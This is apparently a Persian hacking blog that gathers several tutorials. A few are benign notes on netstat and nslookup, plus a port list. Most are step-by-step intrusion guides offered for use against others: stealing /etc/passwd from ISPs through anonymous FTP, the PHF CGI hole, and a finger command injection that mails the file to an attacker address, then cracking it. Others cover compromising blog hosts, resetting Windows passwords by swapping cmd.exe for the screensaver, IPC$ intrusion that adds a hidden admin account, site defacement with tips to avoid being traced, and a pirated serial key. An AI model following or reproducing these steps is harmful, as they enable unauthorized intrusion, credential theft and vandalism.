Active Connections

Proto Local Address Foreign Address State
TCP behrooz:2055 BEHROOZ:0 LISTENING
TCP behrooz:5101 BEHROOZ:0 LISTENING
TCP behrooz:2047 BEHROOZ:0 LISTENING
TCP behrooz:2055 cs43.msg.sc5.yahoo.com:5050 ESTABLISHED
TCP behrooz:nbsession BEHROOZ:0 LISTENING
TCP behrooz:2047 baym-cs21.msgr.hotmail.com:1863 ESTABLISHED
TCP behrooz:1025 BEHROOZ:0 LISTENING
UDP behrooz:2053 *:*
UDP behrooz:discard *:*
UDP behrooz:nbname *:*
UDP behrooz:nbdatagram *:*
UDP behrooz:nfs *:*
UDP behrooz:1037 *:*

خب همانطور که ملاحظه ميکنيد بعضي از پورتهاي اصلي با معادل اسمي نشان داده شدن مثل پورت nbsession ولي اين دستور براي تست کردن نقطه ضعفها و پورتهاي باز در سيستم خودمان خيلي مفيده و اگر سيستم آلوده به تروجن بود ميشه از اين دستورها و کلاً برنامه Netstat اين موضوع را فهميد ، پس آنهايي که سوال ميکنن ما چطوري بفهميم سيستم خودمان آلوده به تروجن هست يا نه ، استفاده از اين دستور و کلاً دستورات Netstat ميتونه خيلي بهشون کمک کنه .

خب تا اينجا شد 4 تا دستور ، اين 4 تا دستور تمام ارتباطهاي شما در شبکه را در MS-DOS نشان ميده ولي مخصوص پروتکل خاصي نبود ، يعني آيپي و پورتها را در TCP - UDP , ... نشان ميداد ولي حالا ميخوام يک دستور ديگه Netstat را بهتون معرفي کنم که بايد خود شما پروتکل را انتخاب کنيد تا ارتباطهاي شما را در آن پروتکل نشان بده .

دستور Netstat -p xxx :
منظور از xxx يعني آن پروتکلي که شما در نظر دارين که ميتونه TCP و UDP باشه ، من با تايپ اين دستور در MS-DOS به اين نتيجه رسيدم :

C:\WINDOWS>netstat -p TCP

Active Connections

Proto Local Address Foreign Address State
TCP behrooz:1030 baym-cs12.msgr.hotmail.com:1863 ESTABLISHED
TCP behrooz:1036 cs46.msg.sc5.yahoo.com:5050 TIME_WAIT
TCP behrooz:1059 svcs.microsoft.com:80 TIME_WAIT
TCP behrooz:1060 msntoday.msn.com:80 TIME_WAIT
TCP behrooz:1063 207.46.134.30:80 TIME_WAIT
TCP behrooz:1067 207.46.134.30:80 TIME_WAIT
TCP behrooz:1073 digital-island-bos-37.focaldata.net:80 CLOSE_WAIT
IT
TCP behrooz:1074 digital-island-bos-37.focaldata.net:80 CLOSE_WAIT
IT
TCP behrooz:1077 cs46.msg.sc5.yahoo.com:5050 ESTABLISHED
TCP behrooz:1087 64.124.82.13.akamai.com:80 ESTABLISHED
TCP behrooz:1111 64.124.82.21.akamai.com:80 ESTABLISHED

که همانطور که مشاهده ميکنيد من ارتباطم را در پروتکل TCP امتحان کردم براي مثال با MSN Messanger با پورت 1863 و با آدرس baym-cs12.msgr.hotmail.com ارتباط برقرار کردم و شما اگر ميخواين آيپي اين سرور را بفهمين ميتونين از دستور Netstat -n استفاده کنيد و آيپي که قبل از پورت 1863 در آن دستور مشاهده ميکنيد آيپي اين سرور هست .

دستور Netstat -e :
اين دستور نيز يکي از دستورات Netstat هستش که آماري از ارتباطها و بسته ها و شماره هاي ارسال و ذخيره بسته ها و داده ها را نشان ميده ، من با تايپ دستور Netstat -e در MS-DOS Prompt اين نتايج را گرفتم :
 

C:\WINDOWS>netstat -e
Interface Statistics

Received Sent

Bytes 628308 224952
Unicast packets 2288 2218
Non-unicast packets 111 111
Discards 0 0
Errors 0 0
Unknown protocols 74

اين دستور بيشتر براي ويندوزهاي 9x - ME و همينطور مودمهايي که آمار بسته ها را نميدن خوبه چون در ويندوز 2000 - XP قسمتي از اين آمار براحتي در اختيار User قرار ميگيره ، شما ميتونين با استفاده از اين دستور ترافيک ISP و شبکه را ببينيد و همينطور برنامه هايي که دارين دانلود ميکنيد را چک کنيد و يا اگر بسته اي در ارسالش مشکلي پيش بياد ميتونين در قسمت Errors مشاهده کنيد ، ...

دستور Netstat -r :
اين دستور توسط کاربران معمولي اينترنت زياد بکار گرفته نميشه چون درک بعضي از گزينه هاش براي کاربران عادي دشوار ، بحرحال اين دستور جزييات دقيقي مثل آدرس Gateway - Interface Metric -Netmask , ... درباره آدرس آيپيتون در شبکه ميده ، همچنين در ويندوزهاي 9x - ME کار دستور Netstat -a روهم انجام ميده ، براي هکينگ نيز اين دستور و کلاً اطلاعات Routing Tables مهم و مفيده ، من با تايپ اين دستور اين نتايج را گرفتم :

D:\>netstat -r

Route Table
===================================
Interface List
0x1 ........................... MS TCP Loopback interface
0x2000003 ...00 53 45 00 00 00 ...... WAN (PPP/SLIP) Interface
===================================
===================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 64.110.148.61 64.110.148.61 1
64.110.148.48 255.255.255.255 64.110.148.61 64.110.148.61 1
64.110.148.61 255.255.255.255 127.0.0.1 127.0.0.1 1
64.255.255.255 255.255.255.255 64.110.148.61 64.110.148.61 1
127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
224.0.0.0 224.0.0.0 64.110.148.61 64.110.148.61 1
Default Gateway: 64.110.148.61
==================================
Persistent Routes:
None

که البته اين دستور را من در ويندوز 2000 استفاده کردم و اگر شما در ويندوز ME يا 9x اين دستور را تايپ کنيد نتايج بيشتري از ارتباطهايتان خواهيذ گرفت .

خب دوستان اين دستورهايي که راجبشون توضيح دادم معروفترين و پرکاربردترين دستورهاي Netstat بود ولي بجز اينها دستورهاي ديگري هم وجود داره که ديگه فکر نکنم توضيح راجب آنها ضروري بنظر برسه ولي براي اينکه خود شما هم تمريني کرده باشين اين دستور را تست کنيد : Netstat -s و ببينيد که چه اطلاعاتي ميتونيد با دادن اين دستور بدست بيارين .

کارت اینترنت مجانی ۹۹درصد عملی

● چند روزي بود فكر استفاده از يك كارت اينترنت مجاني داشت ديوونم ميكرد... البته بگم ها ما حروم خور هم نيستيم ... آخه بابا به پير به پيغمبر نامرديه كه ما اين همه پول كارت هاي آبكي اينترنت رو ميديم ... يكمي هم كيف دنيا رو كنيم ..... اينه
در ضمن هر کی اکانت می خواد می تونه به من به گه !
Unixيكي از سرورهايي است كه در جهان بسيار از آن استفاده مي شود در ايران و دربيشتر شهر هاي بزرگ هم ISPهايي وجود دارند كه سرور آن ها Unixباشند .بنابر اين شما مي توانيد براي هك آن ها از اين راه ها استفاده كنيد شما در اين راه احتمالا با مشكلات زيادي برخورد خواهيد كرد .من راه كامل و بي عيبي را در اختيار شما نمي گذارم براي نفوذ گر شدن بايد تلاش بسياري كرد و اين اشاره اي است كه شما را به طرف راه درست هدايت مي كند .براي هك يونيكس از اين طريق عمل مي كنند كه با روش هايي كه ذكر خواهد شد فايل حاوي Passwordها و IDها را كه به نام Passwdمي باشد دريافت كنند .اين فايل يك فايل متني است كه در آن اطلاعات بصورت رمز در آمده .وقتي شما يك فايل Passwdرا باز كنيد چنين نوشته هايي را
مي بينيد .كه بايد آن را از حالت رمز در آورد .
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:3A62i9qr:1012:10:Mashhad

در اينجا مثلا Tahaنام IDو 3a62...كلمه عبور اما به صورت رمز در آمده مي باشد .
شايد فايل به شكل زير هم باشد .اما اين فايل كار را غيرممكن مي سازد.در صورتي كه به شكل زير باشد يعني در آن علامت *به جاي كلمه ي به رمز آمده به آن ها Shadowedگفته مي شود .
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:*:1012:10:mashhad BFH:/home/user/Taha:/usr/local/bin/tcsh
ما فعلا مي خواهيم اين فايل را دريافت كنيم .اولين قدم اين است كه آيدي در آن ISPبراي خود دست و پا كنيم .حالا اين آيدي مي تواند متعلق به دوستمان باشد و يا يك آشناي دور .پيدا كردن رمز دوست شما به سادگي ميسر است كه در حوصله اين مقاله نمي گنجد .بعد از پيدا كردن رمز شما با آيدي دوستتان به شبكه Connectشويد .اين اتصال مي تواند يك اتصال به طريق Modem DialUp Connectionباشد .بعد از اتصال كامل وارد قسمت MS-DOS Promptشويد و فرمان زير را وارد كنيد
FTP http://www.domain.com/
كه Domainآدرس سرور ISPمي باشد سپس از شما خواسته مي شود تا آيدي خود را وارد كنيد كلمه ي Anonymousرا بزنيد .سپس وقتي درخواست كلمه عبور شد كليد Enterرا بزنيد .اگر وارد سيستم شديد موفق شده ايد در غير اين صورت جمله ي login failedدريافت مي شود .دوباره امتحان كنيد و اين بار در كادر Passwordآدرس Emailاي را وارد كنيد .اگر اين بار هم جواب نداد به جاي كلمه ي anonymousاز Userخود يعني دوستتان استفاده كنيد . احتمال دارد اين بار هم موفق نشويد .اين دفعه روش هاي فوق را براي دستور زير امتحان كنيد
FTP ftp.domain.com
اگر اين بار هم جوابي نگرفتيد با ISPتماس گرفته و سوال كنيد كه چگونه مي توانم از سرور FTPخود شما استفاده كنم چون وارد سيتمتان نمي شود اگر پرسيد براي چه مي خواهيد وارد شويد بگوييد مي خواهم از نرم افزار هاي آن استفاده كنم ولي مواظب باشيد كه نام خود را نگوييد .خلاصه تمام تلاش خود را براي فهميدن روش دستيابي به سيستم بكنيد اگر توانستيد وارد سيستم شويد به راحتي مي توانيد وارد شاخه ي مشخصي رفته و فايل Passwdها را بگيريد ولي احتمال دارد كه آن شاخه براي شما قفل شده باشد .براي كار با FTPبايد دستورات FTPرا ياد داشته باشيد .براي لسيت دستورات مي توانيد ?را تايپ كنيد .ابتدا به شاخه ي ETCبرويد مي توانيد فايل passwdرا در آنجا پيدا كنيد .اين فايل را بگيريد .اگر در آنجا نبود شاخه هاي ديگر را امتحان كنيد .ولي به احتمال زياد همانجاست .حال اگر اصلا نتوانستيد وارد FTPشويد مي توانيد اين فايل را با استفاده از قايلبيت PHFبگيريد .به اين صورت كه در Internet Browserخود آدرس زير را وارد كنيد .
http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd
اگر به اين صورت هم نتوانستيد آن را بگيريد مي توانيد از طريق Fingerاين كار را انجام دهيد .اين روش به شرطي جواب مي دهد كه Serverمورد نظر قابليت Fingerرا داشته باشد .به آدرس زير مراجعه كنيد .
www.domain.com/cgi-bin/finger
اگر اين آدرس كار نكند ديگر هيچ اميدي نيست اما اگر كار كند كادري جلوي شما ظاهر مي شود كه مي خواهد نام مورد نظر خود را بدهيد .آدرس زير را وارد كنيد .
ID@domain.com ; /bin/mail you@somewhere.com < etc/passwd
كه در اين آدرس IDشناسه كاربري يك شخص است كه مثلا مي توانيد از آيدي دوستتان استفاده كنيد domain.comآدرس نام حوزه ي ISPاست و آدرس you@somewhere.comآدرس Emailشماست مثلا اين يك نمونه است .
bfh@internet.com ; /bin/mail amir6_6_6@yahoo.com < etc/passwd
با وارد كردن اين دستور فايل Passwdبراي من به آدرس 3dhack@yahoo.com پست مي شود !
خوب حالا تا الان اگر توانسته ايد فايل را گرفته باشيد كه بهتر در غير اينصورت بايد بي خيال اين روش شويد .
حالا اگر فايل shadowedگير آورديد بقيه ي متن را نخوانيد چون كمكي به شما نمي كند و بايد از روش هاي ديگري استفاده كرد .اما اگر يك فايل مثل نمونه اولي كه در بالا بود گير آورديد مي توانيد كار خود را ادامه دهيد حالا شما نياز به يك برنامه ي Unix Password Crackerداريد معروف ترين اين نوع برنامه ها John Ripperو Cracker Jackمي باشد .اما John Ripper سريعترين نوع اين برنامه مي باشد .اين دو برنامه را مي توانيد از همان آدرس قبلي يعني www.hackersclub.com/km/frontpageبه دست بياوريد اما نمونه ي ديگري از اين نمونه برنامه ها به كتابخانه هك به نام jill_v20 ارسال شد .با استفاده از اين برنامه ها مي توانيد به هدف خود برسيد . به همين راحتي .....
و روش بعد :
+در آینده ای نزدیک اگه پیشنهادها زیاد تر بشه و این بر و بچ پرشین بلاگ گیر ندن یه آموزش آماده کردم که با عکس توضیح دادم این روش 99 درصد عملی است و انجام می شه من که مشکلی نداشتم !

سلام سلام دوستان بعد از مدتها امروز امودم چندتا چیز خوب واستون بزارم

امروز می خوام واسشما عزیزان آموزش هک کردن وبلاگ بگذارم

چندتا از دوستان به من ایمیل زده بودند و گفته بودن که آموزش هک کردن وبلاگ را بده من هم گفتم چشم اما دوستان عزیز یادتان باشد من به طور صریح و واضح این آموزش را نمی دم علتش هم به دلیل مسایل امنیتی است.یکی از دوستان از من پرسیدند که تو چه نوع هکری هستی؟کلاه سیاه یا کاله سفید؟ در جواب ایشان باید بگم که من یک هکر کلاه سفید هستم چون دوست ندارم برم وبلاگ ها یا سایت های مردم را بی خود و بی جهت هک کنم به نظر من اگر می خواهید یک هکر کلاه سیاه خوب شوید باید از مسایلی که هکرهای کلاه سفید با آن سر و کار دارند سر در بیارید چون هکرهای کلاه سیاه((اون طوری که من با چندتاشون صحبت کردم))می گن ما فقط دنبال راه های نفوذ به سیستم ها هستیم و با مسایل ضد هک زیاد آشنایی نداریم اما هکرهای کلاه سفید هم نحوه ی هک کردن را می دانند و هم ضد هک که این کمک بسیار بزرگی برای آن هاست چون وقتی بخوان به یک سیستم نفوذ کنند اما حالا به هر دلیل اون روش نفوذی شان نگیره می فهمند که قربانی چه کارهای امنیتی کرده و ضد آن را می زنند یا از راه های دیگر اقدام می کنند (*سیاهکر*) البته هر هکر حرفه ای وقتی ببینه نمی شه با یه روش وارد شد قطعا روش دیگر رو امتحان می کنه اما در مسایل بزرگ و سرورهای بزرگتر و مهمتر شاید نتواند آن کار را کند که دلیل اصلی اش کمبود اطلاعاتش است

خوب امروز هم همینطوری که گفتم می خوام روش هک کردن یک وبلاگ به صورت کاملا حرفه ای نه بچه بازی که برای صاحب وبلاگ یه تروجان یا یهMagic-Ps بفرستیم بعد ببینیم که روشمون نگرفته و نا امید شیم.

آموزش هک کردن وبلاگ یا همان آموزش هک وبلاگ

هک کدن یک وبلاگ به صورت حرفه ای کار چندان ساده ای نیست و مستلزم این است که شما با مفاهیم کلی شبکه و کار با نرم افزارهای , IP sniffer  NMAP , Nessus بلد باشید و بتوانید با Exploit ها کار کنید البته من نمی خواهم شما را از این کار نا امید کنم ولی بهتر است این نرم افزارها و چیزهایی را که گفتم بلد باشید

خوب ما برای هک کردن یک وبلاگ باید سرور و یا سرویس دهنده ی آن را اول هک کنیم تا بتوانیم رمزها و یوزرنیم های وبلاگ یا وبلاگ های تحت سرویس آن سرور را پیدا کنیم معمولا یوزر نیم ها و یا همان آدرس وبلاگ مثل:

http://www.victim.blogserver.com

که victim آدرس و یوزر نیم وبلاگ است کد بندی نشده است و به راحتی پس از نفوذ به سرویس دهنده ی وبلاگ می توانیم آن را پیدا کنیم اما پسوردها معمولا کدبندی شده اند و ما باید با استفاده از ابزارهای  کرک پسورد،آن پسوردها را از حالت کد شده خارج کنیم که من در زیر اسم چندتا برنامه ی معروف کرک پسورد یا Password Cracker را گذاشته ام:

John the ripper

L0pht crack

Palm crack

که می توانید با جستجو در گوگل لینک دانلود آن ها را پیدا کنید و پس از دانلود از آن ها استفاده کنید که کار با آن ها بسیار آسان است بدین ترتیب که شما کلمه ی کد شده را به آن می دید و برنامه نسبت به اندازه ی ((Length)) آن شروع به شکست کد آن می نماید.یادتان باشد که L0pht crack بعد از حرف L صفر یعنی0 را دارد نه O

حالا ما چگونه به یک سرور وارد شویم؟

شما می توانید با پیدا کردن Vulnerability های یک سرویس دهنده ی وبلاگ به کمک برنامه های NAMP و یا Nessus و امتحان Exploit های نوشته شده برای آن آسیب پذیری ها ((Vulnerability))  به سیستم سرور نفوذ کرده و کنترل آن را در دست بگیرید البته این یادتان باشد که فقط به قسمت اطلاعات سرور که معمولا دارای آسیب پذیری است نفوذ کنید و به قسمت های دیگر به هیچ عنوان نوذ نکنید در ضمن این کار با هک کردن سایت فرق می کند اما روش های نزدیک به همی برای انجام هر دوی آن ها استفاده می شود

در این جا من نام چند سرویس دهنده ی وبلاگ های فارسی را از بیشترین آسیب پذیری به کمترین آسیب پذیری می نویسم:

1. Persianblog

2. Mihanblog

3. caspianblog

4. parsiblog

5. blogfa

6. persiangig

البته بلاگفا تا چند روز پیش در رده ی دوم قرار داشت اما به دلیل اخذ تدابیر امنیتی خوب در رده ی پنجم جای گرفت.البته من این رده بندی را براساس تعداد وبلاگ های هک شده ی آن سرور،تدابیر امنیتی اتخاذ شده ی آن سرور،تعداد دفعاتی که خودم به آن سرور نفوذ کرده ام و سوال از حدود 16 هکر انجا داده ام.

البته اگر این را برای شما سخت است من در پست بعد روش دیگری را که کمی آسان تر است را به شما می گویم.

خوب این هم از آموزش هک کردن وبلاگ قسمت اول.

یکی از دوستان پرسیده بودند که برنامه ی THC-scan 2.0 را ار سایت اصلی اش دانلود کرده ام  اما موقعی که روی برنامه کلیک می کنم صفحه ی سیاهی می یاد و بعدش می ره چه کار کنم؟

دوست عزیز من آسان ترین راه را به شما می گویم اول برنامه یعنی فایل .exe را به پوشه ی System 32  ویندوز خود ببرید و CMD را اجرا کرده و نام برنامه را که در زیر آیکون قرار دارد را در آن بنویسید و Enter کنید و پس از اجرا کار خود را انجام بدید

نظرات یا دتون نره

اگر وقت کردم آموزش بدست آوردن کارت اینتر نتی می زارم  ۹۹درصد عملی هست

اينترنت با هايپرترمينان

سلام دوستان عزيزم امروز قصد دارم دربارهء استفاده از يک برنامه بسيار مهم اما در عين حال سادهء ويندوز برايتان بنويسم . در کليهء ويندوزها شما برنامه ای تحد عنوان هايپرترمينان را می شناسيد . درست حدس زديد . برنامهء مذکور يکی از ابزار مهم هک اينترنتی بحساب می آيد . علاوه بر کاربری که برای ارتباط بين دو کامپيوتر دارد برنامهء مذکور می تواند ابزاری برای هک ISP ها باشد .

اولين قدم : برای هک يک شرکت ISP شما ابتدا بايد يک ID داشته باشيد که می تواند کارت اينترنت باشد . ابتدا بايد توسط هايرترمينان شماره تلفن شرکت را نوشته تا وصل شود . بعد از اتمام اتصال (بستگی به ISP آن شرکت دارد) از شما اسم رمز و پسورد می خواهد .

10 tty 10 5ab102676 Async interface 00:00:00 PPP: 217.219.137.89

12 tty 12 acc110549 Async interface 00:00:03 PPP: 217.219.137.64

13 tty 13 s5c112320 Async interface 00:00:06 PPP: 217.219.137.90

14 tty 14 a3ac107287 Async interface 00:00:00 PPP: 217.219.137.61

فکر کنم با اين اموزش بيشتر حال کنيد

1-به Start > Run برويد و فرمان CMD را تايپ كرده Enter را بزنيد.
2-در پنجره ي باز شده اين فرمان‌ها را بدون عيب و نقص اجرا كنيد :

cd\
cd\windows\system32
mkdir hackpass
copy logon.scr hackpass \logon.scr
copy cmd.exe hackpass \cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit

با اين كار در حقيقت پرامت داس را بجايScreen Saver به ويندوز معرفي مي‌كنيد و اين كار، ويندوز را ناپايدار مي‌كند.
فقط توصيه ميکنم دستورهاي del و rename خيلي سريع انجام شوند (ميتان کل پروسه را در يک فايل bat قرار دهيد) اين دو خط دستور را بايد در عرض كمتر 2 ثانيه انجام دهيد تا فايل هاي مورد نظر توسط ويندوز جايگزين نشوند
3-كامپيوتر را Restart نماييد.
4-Screen Saver ويندوز را فعال نماييد يا منتظر بمانيد تا خود بخود اجرا شود.خواهيد ديد كه، بجاي Screen Saver، خط فرمان DOS ظاهر مي‌شود.
5-اكنون اگر مثلا User name آن ariya بود و خواستيد پسورد آن را به xyxy تغيير دهيد، اين فرمان را در پرامپت DOS انجام دهيد :

net user ariya xyxy

به اين ترتيب پسورد به 222 تغيير خواهد يافت.

نكته: حتما بعد از پايان كار دو فايلي را كه در پوشه ‌ hackpass کپي کرديد را به جاي اول برگردانيد

آموزش حال گیری(اینم یه جورشه دیگه)

آقا شما دارید در روم چت می کنید , حال نمی کنید یک  یا حتی چند نفر خاص در روم 

باشند.

خوب... کافی این کار رو انجام بدید:

این فرمان رو که نوشتم چند بار به سرعت در روم وبعد کنید

اما فرمان:invite******/:           

که به جای****** باید ID طرف رو بنویسید.

البته این کار باید به وسیلهyahoomessenger باvesion بالاتراز5.5 انجام بشه.

اگرهم دیدید طرف می خوات زرگبازی دربیاره هیچ خیالی نیست.این کار کنید:

شما این فرمان را سریع بفرستد:

0kfd11-u5vqvs-n38a65-fkiv84

این دفه مطمن باشید طرف با پای خودش از روم میره بیرون. (اینه!!!)

هک کردن يک سايت

قبل از سلام اگه در مورد هک سايت چيزی نميدونی اينو نخون!
سلام
برای هک کردن يه سايت به ترتيب از راه داس به شرحه زير است:
۱.بعد از انصال به شبکه٬ميری تو داس و به شکل زير عمل ميکنی:
C:\>telnet http://www.domail-name.com/ 79
بجای domain-name اسم سایتی که می خوای هکش کنی مینویسی.اگه پورت ۷۹ که در آخر آدرس مورد نظر نوشتی در سرور باز باشه شما وارد ميشويد و گرنه نميشه
۲.اگر پورت باز بود و شما وارد شديد مشغول خراب کاريتون بشين اونش ديگه به من ربطی نداره می خوای چه بلايی سر سايت بياری.
**نکته**:
۱.اگر در هنگام خراب کاری متوجه شدين سرعت سيستمتون خيلی کم شد سری خارج شو.
۲.اگه از ترس اينکه پيدات کنن٬بعد از خراب کاريت فورا ريست نکن.اول ديسکانکت بعد ریست.
۳.همون طور که اول گفتم اگه چيزی از هک سايت و فرمانهای داس نميدونی اصلا بهت توصيه نميکنم اين کارو بکنی.
۳.اينکه من هيچ مسئوليتی ندارم.

آموزش هك ويندوز 2000,xp,nt

يكي از مشكلات بزرگ ويندوز كه در Service pack هاي ويندوز هم وجود داره IPC هست

حالا ما با استفاده از اين روش كارمون را شروع ميكنيم .

يكي از نرم افزار هاي مورد نياز GFI:LANguard Security Scaner هست كه بخاطر قدرت و كارايي اين برنامه را پيشنهاد ميكنم كه فقط بايد يكسري

تغييرات رو روي آن انجام بدين اين برنامه را از سايت زير داونلود كنيد

http://www.kyzj.com/

Serial:6J7FF-OL03J-9OHQB-1Q0XZ-F7PLZKH5TY-K1GSN-7BT5F-78A0B-CSKYU

البته ورژن 3.3 هم هست ولي من ورژن 3.2 را پيشنهاد ميكنم كه در سايت بالا ورژن 3.2 وجود دارد و سريال بالا نيز مربوط به همين ورژن هست

حالا بايد يكسري تغييرات در اين برنامه بديم .

1.option را انتخاب كنيد و به قسمت Scanning برويد و اين شاخه را انتخاب كنيد Configure ports و حالا در قسمت

Port number/range:1025

port desciription:network blackjacket

و حالا ADD PORT را بزنيد .

در قسمت New scan بايد يك Range اي پي رو اسكن كنيد تا يك اي پي با مشخصات زير پيدا شود

پرت هاي باز 1025,139 را داشته باشد .

IPC share نيز داشته باشد

حالا بايد به اين اي پي به صورت زير كانكت شويد :

1.در قسمت Run اين جمله را وارد كنيد CMD

2. دستور زير را وارد كنيد :

Net use IpadressIPC$""/user:Administrator

اگر دستور زير را دريافت كردين

Successfully The Command was completed

از اي پي مورد نظر Share گرفتين و در اختيار شماست اما در غير اينصورت Share داراي پسوورد ميباشد كه من براي كرك كردن پسسوورد از اين برنامه

استقاده ميكنم :

PQWAK

كه اين برنامه رو از سايت Download.com دريافت كنيد .

بعد از كرك از پسوورد بدست آمده اينگونه استفاده كنيد

Net use ipadressIPC$ "password"/user:administrator

در صورتيكه ميخواهيد با Telnet كانكت شويد مراحل زير را طي كنيد .

در قسمت RUN تايپ كنيد Regedit

به اين آدرس برويد HKEY_LOCAL_MACHINE--Software--Microsoft--Telnet NTLMàServer--1.0

حالا Value date اين فايل رو به اين جمله تغيير دهيد : 1à2

در قسمت بعدي به RUN برويد و اين دستور را تايپ كنيد TELNET

دستور زير را وارد كنيد Telnet ipadress

در ادامه اگر از شما يوزر و پسوورد خواست يوزر را Administrator و پسسورد را خالي بگذاريد

حالا احتياج به ساختن يك يوزر براي خود داريد . اين دستور را در ادامه وارد كنيد :

Net user username password/add

حالا براي قرار دادن يوزر خود در گروه ادمين ها اين دستور را وارد كنيد

Net groups Administrators username/add

تمام شد شما به هدف خود رسيده ايد اما من براي تازه كارها روش اول را پيشنهاد ميكنم

ولي دوستان ديگر ميتوانند از Telnet استفاده كنند

نكته : من هيچ مسئوليتي در مورد تغيير رجيستري نميپذيرم اگر شما قادر به Edit رجيستري نيستيد بهتره از آن يه Backup تهيه كنيد يا

در نهايت از روش اول استفاده كنيد .

درس پنجم

 در آينده ی نزديک در مورد ياهو مسنجر و کارت اينترنت رايگان و اين جور مسايل توضيح می دم فقط يه نمه وقت می بره که اگه صبر کنين دارم يه سايت درست می کنم که ديگه از دست وبلاگ و اين جور چيزا خلاص شيم مثل آقا آراز گل گلاب و اگه ايشون تا يه ماه ديگه در مورد تی سی پی/آی پی چيزی ننويسن خودم شخصا در اين وبلاگ می نويسم اما می خوام ببينم که آيا ايشون می نويسن يا نه چون ايشون به هر حال چهارتا پيراهن بيشتر از ما پاره کردن و در مورد ويندوز و حفره هاش هم می گم وقتتتتتتتتتتتتت بدين بابا الان امتحان دارم نمی تونم در اولين فرصت ممکن براتون می زارم در ضمن هرکی می خواد حفره ها بيشتر باشه و مسايل متفرقه کمتر پيام بزاره اگه زياد بودن درستش می کنم

راستی مطالبتون رو به ادرس ايميل من بفرستين اگه با حال بود می زارم تو وبلاگ+

 

درس چهارم

 خب حالا ما اين اطلاعات رو پيدا کرديم با اينا چی کار کنيم؟

خب عزيزان(تحويلم بگيرين)بعد از استفاده از اون کاری که در درس قبل گفتم می رسيم به چگونگی استفاده از اين اطلاعات خب يه دور اين زيريا رو مرور کنين تا من برگردم

در اين جور اطلاعات می توانيد قسمت های زير را بيابيد

نام شرکت

نام حوزه

آدرس آی پی

و يه سری اطلاعاتی که به درد ما نمی خوره(اين اطلاعات رو سايت زير می ده برين ببينين)در اينجا يه سری اطلاعات در مورد نام و اين جور مسايل داده می شه که زياد مورد استفاده قرار نمی گيره

در واقع مبحثی که من بالا مطرح کردم مبحث تکميلی درس قبل بود می دونين ديگه اما درس جديد از اينجا شروع می شه نه از اون جا حالا اينا رو هم بخونين ضرر نداره

اگه شما از اينترنيک استفاده کرديد که سط آخر نوشته دی اِن اِس و جلوش آدرس آی پی رو نوشته شما با استفاده از اون می تونين به ادامه ی کار بپردازيد اما چون اين سايت تز همه راحت تر و در عين حال کامل تر بود براتون می گم خب حالا کار های زير رو روش انجام بدين و نتيجه رو ببينين

در خط دی اِن اِس سرور نام سرور ها نوشته شده است مثلا سرور1،سرور2 و ....حالا شما با استفاده از دستورات زير می تونين يه اطلاعات ديگری به دست بيارين حالا شروع می کنيم

کامنت پرومنت را باز کنيد و دستورات زير را درونش بنوسيد

c:\>nslookup

با تايپ دستور زير نتايج زير حاصل می شود خودتون ببينيد



*** Can't find server name for address 192.168.20.3: Non-exi...
*** Can't find server name for address 192.168.20.1: Non-exi...
*** Default servers are not available
Default Server: UnKnown
Address: xxx.yyy.zzz.nnn

>
دقت کنيد که علامت > را حتما داشته باشه بعد از اين کار هم دستو زير را تايپ کنين تا يه چيز جديد ياد بگيرين
> server dns_server
شما به جای دی اِن اِس_سرور نام دی اِن اِس سروری که در کار قبل ياد گرفتين و حتما انجام دادين را بزارين بعد از زدن اينتر نتايج زير حاصل می شود
Default Server: site name.com

Address: xxx.yyy.zzz.nnn


در جاهايي که سايت نيم نوشتم چون ممکنه تغيير بکنه برای همين همه رو يکی نوشتم
بعدش اينو بنويسين اگه خطا گرفت دوباره دستور را تايپ کنين و يا از يکی ديگه سرور لستفاده کنين
> set type=any
حالا بستگی داره خطا بگيره يا نه اگه گرفت از بقيه اينا استفاده کنين اما اگه نگرفت اينا رو ادامه بدين
> ls -d site_name .

و درآخر هم اينا رو گير ميارين حال بماند به چه کار ميان

[s1.site name.com]
site name.com. SOA s1.site name.com admin.site name.com.
(2002070412 3600 600 86400 3600)
site name.com. A xxx.yyy.zzz.nnn
site name.com. NS s1.site name.com
site name.com. NS s2.site name.com
site name.com. MX 10 mail.site name.com
site name.com. MX 15 site name.com
ftp CNAME xxx.yyy.zzz.nnn
www CNAME site name.com
site name.com. SOA s1.site name.com admin.site name.com.
(2002070412 3600 600 86400 3600)
>

 

درس سوم

 بعد از اين همه کار می رسيم به مشخص کردن پورت های باز بر روی سرور و يا کلاينت

برای اين کار نيز چند روش وجود دارد ابتدا برای سايت ما می توانيم از دو روش معمول و معقولانه استفاده کنيم اين دو روش در زير آمده است

می باشد که برای اين است که ما ببينيم که پورت هايي که ما می خواهيم روی آن سرور باز است يا نه دستورش هم اين جوری بيدهtelnetاولين روش استفاده از

telnet site name port number

لابد می پرسيد که ديگه پورت چيه؟پورت به طور کلی به درگاه های ورودی و خروجی کامپيوتر گفته می شود که همه منطقی هستند و وجود خارجی ندارند در هر سيستم 65535 عددد پورت تی سی پی و 65535 عدد پورت يو دی پی وجود دارد که همه منطقی هستند(کامپيوتر چقدر منطقی هست)ليست پورت ها اين زير هست بخونينش براتون مفيده



Ports TCP/UDP Service or Application
------ ------- ----------------------------------------
7 tcp echo
11 tcp systat
19 tcp chargen
21 tcp ftp-data
22 tcp ssh
23 tcp telnet
25 tcp smtp
42 tcp nameserver
43 tcp whois
49 udp tacacs
53 udp dns-lookup
53 tcp dns-zone
66 tcp oracle-sqlnet
69 udp tftp
79 tcp finger
80 tcp http
81 tcp alternative for http
88 tcp kerberos or alternative for http
109 tcp pop2
110 tcp pop3
111 tcp sunrpc
118 tcp sqlserv
119 tcp nntp
135 tcp ntrpc-or-dec
139 tcp netbios
143 tcp imap
161 udp snmp
162 udp snmp-trap
179 tcp bgp
256 tcp snmp-checkpoint
389 tcp ldap
396 tcp netware-ip
407 tcp timbuktu
443 tcp https/ssl
445 tcp ms-smb-alternate
445 udp ms-smb-alternate
500 udp ipsec-internet-key-exchange (ike)
513 tcp rlogin
513 udp rwho
514 tcp rshell
514 udp syslog
515 tcp printer
515 udp printer
520 udp router
524 tcp netware-ncp
799 tcp remotely possible
1080 tcp socks
1313 tcp bmc-patrol-db
1352 tcp notes
